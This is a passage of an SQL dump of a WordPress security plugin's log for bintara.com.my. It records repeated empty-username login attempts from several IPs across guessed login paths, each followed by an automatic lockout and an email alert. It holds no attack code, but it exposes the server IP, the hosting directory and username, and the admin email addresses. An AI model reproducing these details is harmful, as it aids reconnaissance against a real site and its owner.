14:03:13',17932936,19338088,'https://bintara.com.my/blog/wp-login.php',1,0,'157.230.185.255'),(26101,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:03:14','2019-09-21 14:03:13',18139440,19338088,'https://bintara.com.my/blog/wp-login.php',1,0,'157.230.185.255'),(26102,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYts1iJ7D9Gn7wDPh8knAAAAMo\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"107.189.3.126\";s:11:\"REMOTE_PORT\";s:5:\"34754\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYts1iJ7D9Gn7wDPh8knAAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074611.8576\";s:12:\"REQUEST_TIME\";s:10:\"1569074611\";}}','notice','2019-09-21 14:03:33','2019-09-21 14:03:32',17847448,19338768,'https://bintara.com.my/blog/wp-login.php',1,0,'107.189.3.126'),(26103,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:03:32\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:03:32\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:03:32\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:03:32\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:03:33','2019-09-21 14:03:32',17931064,19338768,'https://bintara.com.my/blog/wp-login.php',1,0,'107.189.3.126'),(26104,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:03:33','2019-09-21 14:03:32',18137728,19338768,'https://bintara.com.my/blog/wp-login.php',1,0,'107.189.3.126'),(26105,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYtzFiJ7D9Gn7wDPh8krAAAAMo\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"46.101.168.151\";s:11:\"REMOTE_PORT\";s:5:\"59452\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYtzFiJ7D9Gn7wDPh8krAAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569074636.258\";s:12:\"REQUEST_TIME\";s:10:\"1569074636\";}}','notice','2019-09-21 14:03:57','2019-09-21 14:03:56',17848056,19338752,'https://bintara.com.my/test/wp-login.php',1,0,'46.101.168.151'),(26106,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:03:56\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:03:56\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:03:56\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:03:56\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:03:57','2019-09-21 14:03:56',17932920,19338752,'https://bintara.com.my/test/wp-login.php',1,0,'46.101.168.151'),(26107,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:03:57','2019-09-21 14:03:56',18139232,19338752,'https://bintara.com.my/test/wp-login.php',1,0,'46.101.168.151'),(26108,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYt9XkXpgmG5P@iB8k5rgAAAIU\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.28.163\";s:11:\"REMOTE_PORT\";s:5:\"55870\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYt9XkXpgmG5P@iB8k5rgAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1569074677.96\";s:12:\"REQUEST_TIME\";s:10:\"1569074677\";}}','notice','2019-09-21 14:04:39','2019-09-21 14:04:38',17845912,19336192,'https://bintara.com.my/wp/wp-login.php',1,0,'13.127.28.163'),(26109,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:04:38\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:04:38\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:04:38\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:04:38\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:04:39','2019-09-21 14:04:38',17928192,19336192,'https://bintara.com.my/wp/wp-login.php',1,0,'13.127.28.163'),(26110,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:04:39','2019-09-21 14:04:38',18134656,19336192,'https://bintara.com.my/wp/wp-login.php',1,0,'13.127.28.163'),(26111,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYt@jDrcQxTmGrCWuaT9gAAAdg\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.81.84.140\";s:11:\"REMOTE_PORT\";s:5:\"52984\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYt@jDrcQxTmGrCWuaT9gAAAdg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074682.5916\";s:12:\"REQUEST_TIME\";s:10:\"1569074682\";}}','notice','2019-09-21 14:04:43','2019-09-21 14:04:42',17850584,19340944,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.81.84.140'),(26112,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:04:42\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:04:42\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:04:42\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:04:42\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:04:43','2019-09-21 14:04:42',17935024,19340944,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.81.84.140'),(26113,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:04:43','2019-09-21 14:04:42',18141608,19340944,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.81.84.140'),(26114,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYt-nkXpgmG5P@iB8k5uAAAAJE\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"60.245.60.151\";s:11:\"REMOTE_PORT\";s:5:\"60372\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYt-nkXpgmG5P@iB8k5uAAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074686.2775\";s:12:\"REQUEST_TIME\";s:10:\"1569074686\";}}','notice','2019-09-21 14:04:47','2019-09-21 14:04:46',17847448,19338768,'https://bintara.com.my/2019/wp-login.php',1,0,'60.245.60.151'),(26115,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:04:46\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:04:46\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:04:46\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:04:46\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:04:47','2019-09-21 14:04:46',17931064,19338768,'https://bintara.com.my/2019/wp-login.php',1,0,'60.245.60.151'),(26116,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:04:47','2019-09-21 14:04:46',18137728,19338768,'https://bintara.com.my/2019/wp-login.php',1,0,'60.245.60.151'),(26117,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYuM3kXpgmG5P@iB8k52QAAAIg\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.92.254\";s:11:\"REMOTE_PORT\";s:5:\"43686\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYuM3kXpgmG5P@iB8k52QAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-logi